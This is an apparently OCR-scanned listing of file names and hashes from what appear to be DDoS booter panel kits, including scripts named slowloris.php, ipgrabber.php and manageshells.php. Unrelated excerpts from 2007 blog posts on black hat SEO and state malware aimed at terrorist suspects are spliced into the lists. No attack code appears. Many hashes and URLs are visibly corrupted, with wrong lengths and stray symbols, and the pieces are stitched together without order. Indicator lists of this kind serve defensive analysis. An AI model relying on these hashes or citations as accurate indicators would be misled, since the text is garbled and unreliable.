6b627c401b2bc2194d013647309230a9b 
index.php 
6e6cfde661a2367ac60281b1a57da8d5 
login.php 
5910aabf02f0e9acddeb31356d467215 
logout.php 
£7f43702441b28154fb45ble2cddf99c 


logs.php 8d594c84e6f8e5028f4fdd921e3f1lf6b 


manageshells.php 
69b0aaf9eaf5ae6ca01188c2621e783e 
myaccount.php 
63ffeel9acObbaa36ddb11feeb6da37c 
mysettings.php 
7f8delcedb8e6d55c6ca0308f75aa874 
register.php 
768b08e2fee7803dfbb157c7c44a433e 
shells. php 
535720c0cd383622df8ba2b0dd293bb0 
thankyou.php 
c1e8475931adf732999718afaedfa3b9 
updates.php 
b606dd2e00b658e488e78e926d241857 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background.jpg 
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20ae8d57237de989c2e4102122c2253a 
bg. gif 
4986640d1caf7e8b8574c541711a9aea 
logo.png 28b4beb3aa02e7af074946ef8f19fec3 
navigation. gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
styles.css 
99dfc635c2b2c38d8aa04704b89377bd 
count.js e3ad6cf280lafc8bb78ba0d0ca721c37 
jquery-1.3.2.min.js 
bb381e2d19d8eace86b34d20759491a5 
jquery.validate.js 
d4afd58bbf0c43f0998264f92ae1d212 
Team313 _booter.sql 
f60cbc88329c78bf16ab316b6aef468b 
«htaccess 

accept.php 
1d9b47e6fefe5eaf24bb078d6cefc3cd 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
addshell.php 
b8673c63626a6a2b2f4c44f8fbb8b388 
admin.php 
b8c239f08fed087d39ea3e224d003083 
checkuser.php 
2bfcdf002b83830fa65ee308d51a2695 
dbc.php 
4c29e5a3d10cbc494fb89f9c1bdc3009 
do.php 
1b2000290158151cda00caac858e4a6b 
donate.php 
23f33d9ecb6c75d3e845a3ec72c25d92 
enemies.php 
cb771ec70429380ce697d8e32b28702b 
footer1.php 
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72000a73192f1lbe96b92bf80e7 af65f2 
friends.php 
189c62436e22982e16144falb2100973 
get.php 
130f364fb9fe0ba53557c21738aff389 
header.php 
1305eccf62fb1f8348c442e0ffafc790 
hub.php 
26334474b33f49e1c197ae8eef8b423e 
index.php 
ec8e8a0e6db6a3191ff9d5ac74eb38c0 
ipgrabber.php 
43d20534ea9c82be797bc3577d4d8c07 
ips2.php d18d0cec2d3c9a00fleb031d085fc4c3 
log.txt 
dc181bda19732da80b5fd270494d139a 
login.php 
65c9531e80748f395238cbb4f0b4913f 
logout.php 
£7f43702441b28154fb45ble2cddf99c 
logs.php 28d5fa4883c138ac4547d6994a7d5901 
manageshells.php 
b164140f7d44dba312efe199a4ad253d 
mysettings.php 
0161f4e592197a0e05b529e5d73c042b 
pinger.php 
f9a61017254cb65c3e7al191fbc06ea48 
post.php 4c9bd2f1214eda3994d42101fede5944 
register.php 
1dbc8648ea79690ab607334106aafa22 
shellcounter.php 
807b62d5348f8c79c326058e278c75d0 
shells.php 
f80c9db6af46a790325a9430fd0351d0 


slowloris.php 
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f9f995315941f1025512bf8450a7d147 
staff.php 
a6bc06cb94741b32fdde95c97bdc6730 
style.css 
803a979dd494cec76e3571496f71275e 
stylel.css 
ca497edcba35b7e487d463df6f9a0bc4 
style2.css 
a68ff93c6b5f87d9a0f7864bcb6cfal2d 
style3.css 
9733bef693ffd413d14749fed5d6aa2e 
support.php 
dff4b95b2c3c1d42e674ed9fa6c0d576 
thankyou.php 
347eda02579d6ae7a6623d98bal9e9c6 
tos.php 
89396765afb8bcle7dd47f6552a069a9 
updates.php 
70951b7734410648697ebce3aal942cc 
vpn.php 
6b9ef7e9c96F23f94087427e6a98946Ff 
«htaccess 
ccff4f837bada2e59d67c980782986b2 
about _bg.jpg 
f0d651e3991c0b68446242dad29ee619 
about icon.jpg 
62e7ce78da8a48aa6087f57100c0c59f 
about iconl.jpg 
521b0060873a9ac887ecb9611e85a041 
about icon2.jpg 
9e2e4504a748f35a77d8ca3ef00d0cde 
about _img.jpg 
cd9650658d16dff800866718774f55e5 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
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3.9.5 Examples of Search Engine Spam (2007-09-05 15:56) 


www.cashhomes.info 


Welcome To Cash to you sparen laa 


Ade by C wogle 


1112 Gsm 
Unlocked Phone 


Mobile phone 
applications 


Perhaps | should say an example of a 50/50 black hat SEO, as Google’s not listing the first, 
but has already crawled the second -cashhomes.info/content ; mydream-condos.info/content. 
While assesing the first link farm | found out that on average, 263 pages have exactly 6411 
outside links in them, 24.3 links per page. Pretty much the same case with the second one. 
Owning hundreds of domains like these and feeding them with garbage content in between 
syndicating ads can undermine a search engine’s credibility if the black hat SEO operation 
starts appearing at the top results, and as we've already seen, both [1]black hat SEO and paid 
keywords advertising can lead to malware embedded sites. 


1. http://ddanchev. blogspot .com/2007/04/malicious-keywords- advertising. html 


3.9.6 Infecting Terrorist Suspects with Malware (2007-09-06 16:58) 


As we’ve already seen in the past, cyber jihadists, thus wannabe terrorists, use [1]commercial 
anti virus, [2]anti spyware and [3]Janonymity software. Therefore, if law enforcement starts 
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add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062f7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background _bg.jpg 
40b20922be99d2ac534507e7b57787c1 
banner.jpg 

59a876fdbf65f5167 7cO0fe4122a23468 
banner2.jpg 

59a876fdbf65f5167 7cOfe4122a23468 
banner3.jpg 

59a876fdbf65f5167 7c0fe4122a23468 
banner4.jpg 

59a876fdbf65f5167 7cOfe4122a23468 
bannernewl1.jpg 
acd14e7832a9b9944e28126b85571ea0 
bannernew2.jpg 
17ff2119cfde7948ef52887b421620ab 
bannernew3.jpg 
905989ee1ae57de408d02520cb3491a7 
banner _background.jpg 
49e470de25eefd4cf65e335c9leac4e8 
bg.gif 
fo2ce9ab9c5bO0f6df442fa7d77b77978 
blog _bg.jpg 
41895eb74885ecab938f9fec6be1417f 
blog bottom.jpg 
a03d8dbb4849f83a3e06a99fe9784b24 
blog top.jpg 
26245499b432f53c52c3c24e76b0fe9a 
body _bg.jpg 
82acc71340d17ca597229670c8ccd6b8 
body bgl.jpg 
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65877ee38laaa9e8a2b881ffe2253fee 
box.gif 
5b37c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
company _iconl.png 
bd7dd06171d308ac96299adca8b7881b 
company _icon2.png 
38bc733cc36375431cf6bc6afl8a760f 
company _icon3.png 
60a287299c7d06254b312d0fb0f87e15 
company _icon4.png 
597d29b7e96c7a81ba01239b7e8d501a 
contact iocn.jpg 
f88e8a22cb17c81a4fe4e47b312e9d25 
delete.png 
6bf9ba341234639d4550602fd35e0988 
faviconl.png 
db624fe54779b11cb6b88a29989f0FC9 
footer bg.jpg 
b0eaeed24bdd99b1b921f8591928e879 
footer _iconl.jpg 
f8fbf36a6d5883579158ebc464bd17c5 
footer _icon2.jpg 
f360db07aada22fdab52b1561ef314d7 
footer _icon3.jpg 
12b148dfa0d2a467cda683913d38999b 
footer _icon4.jpg 
98f56f71fd339501793bf603c60237a6 
footer _line.jpg 
bd17178173e8783040fe5943210218fa 
get _bg.jpg 
34250f8da8c8e28ace285cfe009e7 793 
get _icon.png 
77cb1e4853f5adf97ec5256933fd6092 
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heading _bg.jpg 
79e€439b43e3alcf9e9a83a9cbd1159b2 
heading _bor.jpg 
b1866037554635146e136d4afe89cef8 
home.gif d2c93d8510e7fc077f9ef7 765ff20a89 
hub.png 
fdeaf68ba6e3b0ba507a55ee85143307 

info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png Obad85f30b97b1d1011c8161c66443f4 
input _bg.jpg 
12f246571e239a599c7a9d7f38c2291b 

key _icon.png 
1cf5178b065b7f99f6209f5893393b9b 

logo.jog 86062ac3a61d0711bd4b389e43ac6450 
more _button.png 
3e78a9c886cb74b24d7d6d968e092f62 

more _buttonl.png 
affb2dd02d0323fccf46c7acl4c78d5c 

more _button2.png 
8d430bfd6c6ca3eabeee91cde2bas89F9 

more _button3.jpg 
5eb77ba03d9c17842db76aldbedac394 

more _button3.png 
623af554f967e263f0e25ac68b9e8e00 

more button _hover.png 
20c852ebdbd0da32c21894065252481b 
navigation.gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
news.gif 8b0a1312d184260ea42506f66298da5d 
our h2_bg.jpg 
09d6fb242052553e7df6d01a13d3786b 

our inner blog _bg.jpg 
4bcdee2fb7fe5c30ae03958ae814c91f 

our inner blog bottom.jpg 
b32b18af5ccad292c3207bf4c1f89175 
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our inner blog bottom.png 
5931a49b817c65ec33f8835a5c20817b 
our inner blog _top.jpg 
9b88a945b71b4807c3fb2d9falcc3fb7 
our inner blog top.png 
93948c79ea81ba29c9fb77072b6f3af2 
portfolio icon.jpg 
df707b155a9feb0balc169276ec26582 
portfolio _imgl1l.jpg 
4470ee261159d02c7a581627ee73a45a 
portfolio img2.jpg 

8e02efb82446420a7 1leeb4e0b89b9f6F 
portfolio img3.jpg 
ba6bd8ab2d59b8d5d0c9d1028ad7b345 
p _border.jpg 
4d83ec25b6f5485c8c833b77ec37ac82 
question mark _icon.png 
7f716c0178b9dbea58e5415f1f4d700e 
send.jpg 5db26c3ae7clb5a6ce713bedc2153eb0 
service _iconl.jpg 
73a2106867256bae149d8e33718a817e 
service _imgl.jpg 
2b19d2a163c84fc5db03d869f4f50ba7 
service img2.jpg 
lcdfae3f87de9c2c4951fc2e476f55d2 
service _img3.jpg 
6e4ccd8c3b394cb561f44e18379fe893 
Slider bg.jpg 
a503593bed55b1ce582b59b1a67fc8b4 
standard bg.jpg 
13460321633ddaa5371a30cc4f81ac87 
standard _bottom.jpg 
6ed49c8751b96b27330e5f8b595458f3 
standard top.jpg 
b9150f8d76a5a73940f025412b7fb990 
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star _icon.png 
45d9358c65755f3ab34elaffOf4fo4fs 
styles.css 
596725dff5fe2e5416f4907ccc56c054 
ta-mark.png 
c38a91470f3c4de3017732702f065aff 
textarea _bg.jpg 
ea0a0c0551ef8e1d8865953d240764cc 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 
VPN-OSX-setup01.jpg 
cla6be6fa8d02b753dfff5020d7d4e538 
VPN-OSX-setup02.jpg 
6056b0d0b98b33e166916adc9a539d28 
VPN-OSX-setup03.jpg 
7ae7f3eebef731a34f3f17df4e5495bc 
VPN-OSX-setup04.jpg 
e€02d7073f01dc5baa8df00f297ee0cb1 
VPN-OSX-setup05.jpg 
bee8b7088c41f4d531635ca9102118f6 
VPN-OSX-setup06.jpg 
cdb74440f208cf7a0db46bd08def7264 
VPN-OSX-setup07.jpg 
d67e82125ab8a2cfe86971fbf5c4397b 
VPN-OSX-setup08.jpg 
885ee733743591537f142bd19e98a35c 
VPN-OSX-setup09.jpg 
65f3957c22f3176d4fe322e52ffb4546 
VPN-OSX-setup10.jpg 
225e22a18984b71748dc7c122ea4b437 
VPN-OSX-setup11.jpg 
a24d90c459646bf95bf8ceb663ba33a9 
VPN-OSX-setup12.jpg 
197bf766042339f9af1f28d6e9303147 
VPN-OSX-setup13.jpg 
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89e2a023297ff7ee42bd1a5dbb9a6167 
win7-setup01.jpg 
5f1f3aa88e70cb45508980aac1f7838d 
win7-setup010.jpg 
0f04c38070a873bb64dabbab0fc42535 
win7-setup011.jpg 
810a33b0e9709e693675b8c650b3b52f 
win7-setup02.jpg 
4187e42055cb1707c53303c1be7b5172 
win7-setup03.jpg 
719f781761dec118df69734686af0b22 
win7-setup04.jpg 
062f2c70da7138d0ad1966c968130a4c 
win7-setup05.jpg 
ad9fd28b5a66e9a14486643148d2ed5b 
win7-setup06.jpg 
cf511293f7ceef5df3e2ae1e5a73937e 
win7-setup07.jpg 
657fb307a40d55cffcO2dcc4d2a68cc3 
win7-setup08.jpg 
75dfd6732a446b8425cae456bfff35c6 
win7-setup09.jpg 
72257cd8ff7847694ffd10f007df0289 
l.jpg 
19c441e85da87f50ed0e7c361e1c75d0 
2.jpg 
4d62400c505aa5cab687be5195b28b39 
3.jpg 
83eldfal6fa3bd9a797572f6fald7c35 
4.jpg 
€38439bd6491f740912fe5f9b3fccf58 
5.JPg 
a090104f27f475e6925dd468f5 1cdc6f 
6.jpg 
82f89de0659be88elda2302e82dc6fac 
10468 


7,jpg 
572¢140f425111d2b4299a3a533980el1 
8.jpg 
bf34e71ff8effb62a5105fb22767a3b3 
9.jpg 
60ded9b15e56b5594cc80363bf16f25c 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
542ae04084746ebe5c1436aad5620854 
ezSQLCore.php 
7fed28721c8597a095f23832f98d53c5 
functions.php 
21bd3f76edc7b550d21c2f580454fa78 


count.js fal7e54d6f5acda595b954d16fa8ae34 


ie6.js 
41ecb197c941b8ce2647d932109bf861 
jquery-1.3.1.min.js 
5018fce9eafl431e83fca0de4a735ef4 
jquery-1.3.2.min.js 
7d91ff87b2c0439ac76c5afObccb877b 
jquery-1.4.4.min.js 
b76fc63a9c3fc4293fb90990818dd100 
jquery.validate.js 
380280a6dbal4ec4cdab6ad0932d8d7e 
pnogfix.js 
9e47d6652eb0e73c2efd94a7489f6F32 
selectAllCheckBoxes.js 
cf29c8b3d2a431732a8f838c5609d26d 
ie6.css 

style.css 
e3e12fcfb84128114a05fef0bc4471 ff 
Capture.PNG 
5fa60d87241e433b4081ecabe234f111 
login.PNG 
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2e58e692dc97b51d6a31af3a76f8068d 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
addshell.php 
ad549b6977050acf5379264a64c7cde5 
admin.php 
5010b63c40f426accea17735b94692fc 
autoboot.php 
fa1193c9696426eece710842b88a29d6 
check.php 
d534b8a69df0a9ae5f4a2e22b1db385c 
checkuser.php 
2bfcdf002b83830fa65ee308d51a2695 
dbc.php 
5ca95bfb51ad4d0d8aad474e8a57152f 
do.php 
6fled2d14b188edal142a604e9f37215d 
error log 
2655256fef71a10271504c4555b1891f 
footer.php 
3f8b317cefea25506e14ddaalaa7cb4b 
get.php 
949delde7abb7f71b5c54b80b7635cc9 
header.php 
ac9bd938fee4691ba783d8386669523b 
hub.php 
35flae7aa8eab7f7db4516aa5050dc70 
index.php 
7733c1d5f5e64aff360cada59a025b11 
login.php 
9d7b7dfacff30924c648c68bf477e9cc 
logout.php 
37c363afcflc4772a3fd5e107cab60b5 
logs.php 2e€69967fb03486225b2c5f4b674989dc 
manageshells.php 
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53ccdbda7820fa8d1d5c7606b7414503 
mysettings.php 
289385e48c5fba47ee861b52fd1738be 
navigation.php 
2cdc40b79c686641bb0b2264d91af033 
post.php 75a0171f32987ebd5bc4b1dc813833a4 
register.php 
d0c7fee5391aa99a83346d61fe742195 
shellcounter.php 
67c0196a948edfal6a25363889833012 
shells.php 
968210ffc0210a2d2507e587afcc3031 
slowloris.php 
d4fc8514a9d44d5913bfbf8fab4f454d 
staff.php 
52472d8149bc5e6019e74c150569f80b 
thankyou.php 
c1e8475931adf732999718afaedfa3b9 
updates.php 
f30db917bc87641fea9900bda4ccb4a8 
style.css 
b7bd4aaeed3d8f307946d180bb5148c3 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062f7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background.jpg 
7aa4d2b3c58372160d5fad75a52c5567 
background1.jpg 
20ae8d57237de989c2e4102122c2253a 
bg.gif 
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4986640d1caf7e8b8574c541711a9aea 

box.gif 

ab9c7ae3f11411185bb573f75e8elc2d 
boxl.gif 5637c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
delete.png 
6bf9ba341234639d4550602fd35e0988 
home.gif d2c93d8510e7fc07 7f9ef7 765ff20a89 
hub.png 
fdeaf68ba6e3b0ba507a55ee85143307 

info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png Obad85f30b97b1d1011c8161c66443f4 
login.css 
€2839c5f7867ae85d1e45f194ae7a41la 
logol.png 
4a4ef4dd665adf24e530cbbaa094794f 
logo2.png 
cd9dfc0c19611f418cb4312719a3c556 
navigation.gif 
ab9c7ae3f11411185bb573f75e8elc2d 
navigation1.gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
news.gif 8b0a1312d184260ea42506f66298da5d 
slider.js 

42def172ef7d80f65e3c092al1ef0d81 

Slider handle.gif 
fee1994bccda07ac749b7636dfe047e0 
styles(old).css 
661317acdd1c4383556f5al0ffcf5479 
styles.css 
bf5ad0f8f749375328c3ef6249707c99 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 
EpiCurl.php 
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benchmarking its creations against the most popular anti virus software, and purchasing 
private malware crypters to obfuscate the binaries, who would security vendors be protecting 
you from - law enforcement, or Yuri and Andrei, the [4]fictional characters of two botnet 
masters? The practice is nothing new when it comes to intelligence gathering and the 
concept of [5JOSINT through malware for instance. What’s new is its applicability to law 
enforcement, which [6]in a combination with bureaucracy could mean a law in a typical 
Chinese anti-censorship enforcement, that would oblige security vendors in the coutry to 
ignore the malware if they want to continue doing business there. Could we perhaps also 
witness a collective bargaining effort from security vendors not to do this, given [7]the interest 
of [8]using malware against [9]potential suspects, a largely open topic by itself? [10]Germany 
floats Trojan for terror suspects : 


"Would-be terrorists need only use Ubuntu Linux to avoid the ploy. And even if they 
stuck with Windows their anti-virus software might detect the malware. Anti-virus firms that 
accede to law enforcement demands to turn a blind eye to state-sanctioned malware risk 
undermining trust in their software, as similar experience in the US has shown. Once the 
malware gets into circulation there’s no guarantee it won’t be turned against innocent users. 
The whole concept is loaded with irony. For one thing, German government computers, like 
those in the UK before them, are currently under targeted Trojan assault." 


[11]Targeted mailings to potential terrorists wouldn’t work as effective as embedding IFRAMES 
within the [12]cyber jihadist communities, and in the future, we may also see anti-terrorist 
malware kits courtesy of an unknown government that’s [13]purchasing or bidding for zero 
day browser vulnerabilities or anti virus software ones, in order to infect potential terrorists by 
bypassing their security solutions in place. 


. http: //ddanchev. blogspot .com/2007/03/jihadists-using-kaspersky-anti-virus.htm 
ttp://ddanchev. blogspot .com/2007/08/534-biographies-of-jihadist-fighters.htm 


. http: //ddanchev. blogspot .com/2007/07/cyber-jihadists-and-tor.html 


. http: //ddanchev.stripgenerator.com/2007/09/02/all-warfare-is-based-on-deception.htm 


_hetp://adanchev. blogspot .con/7007/04/osint~through-botnets. nea 
_ftep://adanchey, blogepot con/2007/0T /insecure-bureaueracy-an-gerbany al 
| netp://nevs.zdnet.con/2100-1009_22-6197020. nea 

| http://any. wired, con/politice/lav/nevs/2007/07/fbi_spyward 

_http:/ olog. wired. con/defense/2007/01 /fbi-spyware-rev heel 

10. http://www. theregister .co.uk/2007/09/03/german_trojan_plan/ 


11. bhttp://arstechnica.com/news.ars/post/20070903-germany-to-join-us-in-using-policeware-for-espionage-inve 


stigations.htm 


12. http: //ddanchev.blogspot .com/2007/08/analyses- of-cyber- jihadist-forums-and.htm 


13. http://ddanchev.blogspot .com/2007/07/zero-day-vulnerabilities-auction. htm 
1050 


1 
2 
3 
4 
5 
6 
7 
8 
9 


87519746acfd86a4eee60b297cf29929 
ezSQL.php 
f892f7586547fb8f174e4cfa1l835af97 
ezSQLCore.php 
b20797087c5159c1d37fc51446033ce9 
functions.php 
e93fe5f5b3efe9ac9bdad2d6b67f56d1 
count.js e3ad6cf280lafc8bb78ba0d0ca721c37 
jquery-1.3.2.min.js 
bb381e2d19d8eace86b34d20759491a5 
jquery-1.4.4.min.js 
73a9c334c5ca71d70d092b42064f6476 
jquery.validate.js 
d4afd58bbf0c43f0998264f92ae1d212 
free _source.sql 
1db77fd21fad8dfe60165b2122aedfde 
Install.txt 
db40780ba3f60a339eb67f66796b6e39 
boot.php 5e36824f1052f165637ef273a8a5efe0 
config.php 
7204cbe253db1b7f2df89913cb0lae2e 
funny.php 
a77b3836e4672a3045b1a6400a6b47e4 
index.php 
d937f65bda69b982195c5f80ecO0f0b36 
logger.php 
e7d1e3f65b6b7e999554b1a461925b49 
login.php 
b4846811770533da8ab3bc20c8128b17 
settings.php 
c264ed6f75e577b5b5d2930cc7b60fe4 
unset.php 
7¢€82765a9a973f2e102105c4ecelda95 
api.php 
d4a3e952ca48506b08a32b037bca03al 
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edit.php 73cf4c49380968c1d87331caec5784bb 
index.php 
e50bba0067850c8cd1f3315f795e68b6 
logs.php f37df969d022909fb1da52fbda2ed0ac 
users.php 
Ode8eb6a5e2bf0f57aaa9b9edd3e3f334 
bootstrap-overrides.css 
09cb8448435842cbe5e5d6b7c4cf8d51 
bootstrap-responsive.css 
702€8485242b3ae5b4ce75a5edel3acb 
bootstrap.css 
6fa2911ee460068a855177a8dda42ab6e 
font-awesome.css 
4322506f6cfdb2dc7b9a878ad875114c 
slate-responsive.css 
c507eb0f6e7896cdd74ae9d31d256c94 
Slate.css 
54ff9bf79e161e5e9e30f2414a17al13d 
error.css 
e7423ccabec3b96dbd4fca9183098956 
gallery.css 
891432968a9c69156f3d6a10874b90F4 
pricing.css 
b873264294f9ba71fc5bb2443ae35fb6 
signin.css 
07aa68f03d931d1738c3927d9c9135a8 
calendar.css 
741e55cb7ded0d20a37bbf6e7b546b92 
dashboard.css 
Ob2af90f1c6129aab6f9ceb54668f2152 
faq.css 
d59e448c7ab0c10fb3cc40e1caaa2016 
invoice.css 
c4e34627ade938366e0bb35d6448514b 
pricing.css 
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8b56e77a59bd028bb71691a42fdf7e8a 
reports.css 
80dd18be36bbb2d7b1f4f940cfac4955 
ui-elements.css 
30d245e06f09ccbla2dlaf385ce9aaf0 
jquery-ui-1.8.21.custom.css 
£72198c22d1c81f07964aa397bb56d2e 

ui-bg _diagonals-thick 18 b81900 40x40.png 
95f9cceeb9d742dd3e917ec1l6ed754f8 

ui-bg diagonals-thick 20 666666 40x40.png 
f040b255ca13e693da34ab33c7d6b554 

ui-bg flat _10 000000 40x100.png 
c18cd01623c7fed23c80d53e2f5e7c78 

ui-bg glass 100 féf6f6 1x400.png 
5f1847175ba18c41322cb9cb0581e0fb 

ui-bg glass 100 fdf5ce 1x400.png 
d26e8f463195a7b86f86b7d550cfc114 

ui-bg glass 65 _ffffff 1x400.png 
e5a8f32e28fd5c27bf0fed33c8a8b9b5 

ui-bg _gloss-wave 35 f6a828 500x100.png 
58d2cd501e01573cf537089c694ba899 
ui-bg _highlight-soft 100 eeeeee 1x100.png 
384c3f17709ba0f809b023b6e7b10b84 

ui-bg _highlight-soft 75 ffe45c _1x100.png 
b806658954cb4d16ade897 7af737f486 
ui-icons 222222 256x240.png 
ebe6b6902a408fbf9Ccac6379a1477525 
ui-icons 228ef1 _256x240.png 
79f41c0765e9ec18562b20b0801d748b 
ui-icons _ef8c08 _256x240.png 
ef9a6ccfe3b14041928ddc708665b226 
ui-icons _ffd27a _256x240.png 
ab8c30acc0e3608fb79e01fccf832c70 
ui-icons _ffffff 256x240.png 
342bc03f6264c75d3f1d7f99e34295b9 
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fontawesome-webfont.eot 
5f4a40c122903174c4227e6871b88cff 
fontawesome-webfont.svg 
13420cbc7af6227733d1lal2e5df28fe9 
fontawesome-webfont.ttf 
6ea09593203493bfd053a1le838c62404 
fontawesome-webfont.woff 
04b9bfc362dcb9bc999c7d1bcb44a942 
fontawesome-webfontd41d.eot 
5f4a40c122903174c4227e6871b88cff 
avatar.jpg 
8e7cfef33b8180fde8579578c2c5421e 
bg.png 
ae80b7bacb9833eef33244c3d0fedb7c 
glyphicons-halflings-white.png 
9bbc6e9602998a385c2ea13df56470fd 
glyphicons-halflings.png 
74b801ed8644409a1d166bbf33ac3d95 
handle.png 
3d6a926309d7be89bfbaaf3539fa86a6 
page-title-bg.png 
5a24954f130825b32bc8390b1162308d 
title.png 
3bf19898ae07b5b884836ff3 7f3066c2 
frame.png 
dfa01cc7d159eb8fe3dbffc27c13d3f1 
Irl.png 
136c49ca7f00b94265075de61cdd4235 
Irl _large.png 
6f56895219d8c3720304e48388ce7603 
Ir2.png 
884a5386a2da79e4406c4542352249ce 
Ir2_large.png 
babf87a41b33be6cle2e8684986dfd51 
Ir3.png 
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caad4bea8d3c3efe3c3968f29245e835 
Ir3 _large.png 
2a85f5bef3e5100ccOfb4ede53012ad1 
Ir4.png 
e57f445ade1964bd14b32733419f3b09 
Ir4_large.png 
e5eb375cb175e76b4bd60deb610793d2 
Ir5.png 
31da2de775408446a8bc2a42cb22e920 
Ir5 _large.png 
e718c969f7027e0a816375bc756af3fa 
Ir6.png 
e08014a17f87462ee69e526c3ac35300 
Iré_large.png 
2baf95621906baeb1568902fa78f9a61 
4.jpg 
f976727adc1503e4f76466f90b7a4738 
check.png 
1e1f6e465a351892b4c3d3245c395aa6 
fb _btn.png 
3cd7724f1f49583079499423e782e7ea 
password.png 
bf7alcf9d90082164f8942f893062814 
twitter _btn.png 
74bd66906dcd6653d82ea7caclb711a9 
user.png fc087053b89fb4399d1fbb316d6eeeec 
cross.png 
42492684e24356a4081134894eabeb9e 
email.png 
af58188296abfe7adbf9280a563731f2 
page white copy.png 
38de59d96ecaal47d8b5f440b4c4b0e6 
page white go.png 
08cbb971307a4420839b409ea2eccf3d 
pencil.png 
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a34e71ab08a6d1162b948d26321dea50 
printer.png 
242421c98dbd8b054fc76a036d04321¢c 
valid.png 
3a7f05f010b40b006e17066746ab817d 
css.php 
97955749a76dd924c7c50d2c34cf2767 
footer.php 
26f2b8c6a9ab5fcf2edd42ce99a0cbeb 
functions.php 
fobO08d2c8a2df0577fal8d49cfeac982e 
header.php 
67081dba2c889698ade7a8418e4c4de6 
stats.php 
b644b25fdab1582aafe360665ea56d6f 
bootstrap.js 
Ode7fe47210e7736209d2fef5e5e5696 
jquery-1.7.2.min.js 
acc0adc6c188845a409bf158d2de4451 
jquery-ui-1.8.18.custom.min.js 
ab482777e459017809092a6bf1cOfc71 
jquery-ui-1.8.21.custom.min.js 
263684cccc9485ea6acc541c48e7ab66e 
jquery.ui.touch-punch.min.js 
eb876f2754b9957f35d839b4ee75776e 
Slate.js b6cc7e93c98221160064a997f629cfdc 
demo.calendar.js 
06d375829a86a0942137d49e8bc3405c 
demo.faq.js 
bd2c8864bd1e5858b02f0b3f8aafa59b 
demo.gallery.js 
efeabb58aa62e78154419cdacada94d6 
demo.tables.js 
80a43137abe6e4647bbf49074184d5ae 
demo.ui-elements.js 
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77d4e2d950c1f923e83d6efb7d557c21 
demo.validate.js 
da3bcaa4293830d59b08d334074aee2d 
demo.wizard.js 
250703a05a4edf8cadf05f65f8e82dd9 
area.js 
cbe291ebb181ca460f2581a4090a8ac3 
bar.js 
35fa43e57aa49c0385792287196b9d5d 


donut.js aflf6384de42ec42432aee8052f9f969 


line.js 
e5bf172204200ccf35c340840a55ead1 
pie.js 
05c169293267caf260058eba8a48a3bc 
colorpicker.css 
80b90e7eflb8d6e9d51e2ca294798ee9 
alpha.png 
10f4b956ec4d7e11c2b0c1cc1le18db1 
hue.png 
de10f7b98e37a57ee81149a71d2c6106 
saturation.png 
512a83ac26d1574e25d742fe81cf531b 
bootstrap-colorpicker.js 
8a2a8b50ffcacla90fcb3d116cdefcb7 
DT _bootstrap.css 
e3af2f22a0eb0ffd82c74a557bbb8007 
DT _bootstrap.js 
5f82a2efccec2870a78bf257572e491b 
jquery.dataTables.js 
46bdfa08298462991e8da9ce95dec158 
sort _asc.png 
816cc30745c3cbb710e1872aef757198 
sort both.png 
58872c6fclccfd69af8ff69d7128a07d 


sort _desc.png 
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8e127eddeb3ed3622b56a7a8b5b102e7 
sort _asc.png 
60a9afd937310ae1fc9d0b7605012850 
sort both.png 
58872c6fclccfd69af8ff69d7128a07d 
sort _desc.png 
a97846387e7d622e543024af6776cc19 
excanvas.min.js 
3682670784157eca627a91ae04f925b8 
faq.css 
d656738c7e066ed5b4bbcb6e4e56cfd9f 
faq.js 
dec54381f96efbee5b0d610d83e88405 
jquery.flot.js 
c38e58103853f44853096540c1c8066d 
jquery.flot.orderBars.js 
4a39ac97eb068c82601d02eb190b8a81 
jquery.flot.pie.js 
446c008453546019c7daa771426590f3 
jquery.flot.resize.js 
5f5d414398aab4f071ccbe772b49fb80 
fullcalendar.css 
b3c483e82c696f4b06b7152a2ccb84cl 
fullcalendar.min.js 
9ea7bb213862d1e23d7af33d4f1c3805 
jquery.lightbox.js 
f50adde566e9709b771c2cf77cad5c68 
jquery.lightbox.css 
91d55daff9aa0cc8fab60d60c7901642 
jquery-lightbox-theme.png 
73dd1f7b596faa2f5b5d9e6bb6a08fbae 
loading.gif 
e6a8elcb63b0af0a2c9b7db08bf8db9b 
msgAlert.css 
ea30alac7e54626f5ebdfe8bad3d9a2b 
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msgAlert button bg.png 
ddcbcc2f64434ff09085bd614fb01ledb 
msgAlert _close.png 
6bc210135d2b0e264f722008c56b84b4 
msgAlert _error.png 
9001d3974e84d8ddd8f6972c7a975c46 
msgAlert header.png 
9f35405709022f480c7b67859476008f 
msgAlert _info.png 
0235540f0960039311039efbf8bdd4bf 
msgAlert _success.png 
82819f3e5093bc04d0da97c223310cfe 
msgAlert _warning.png 
5164c55064feacf28509a47490d9d47d 
msgAlert.js 
62ce1l28befe7a015255fac5891693229 
msgGrowl.css 
be903fldd9c5fecc957d93b8119efcee 
msgGrowl close.png 
c9d029a1f34f550b3052103c42681576 
msgGrowl _error.png 
5abbd1be943ed72a3250bd8efca4bb82 
msgGrowl _info.png 
f9f84ac5962d843392ceb5381060229a 
msgGrowl _success.png 
e069df54264456e36198352cc8702b2F 
msgGrowl _warning.png 
f040d7d04058121ae88e783aad77ea8b 
msgGrowl.js 
18600fcec02f374644951a1l5d9dfe945 
responsive-tables.css 
3364431395e5424eb6f73913d5e9d138 
responsive-tables.js 
e28adf10ad542c2b1da3a1c8833834f8 
jquery.smartWizard-2.0.modified.js 
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54bc5cbc3d2958627064cala4e8decd0 
smart _wizard.modified.css 
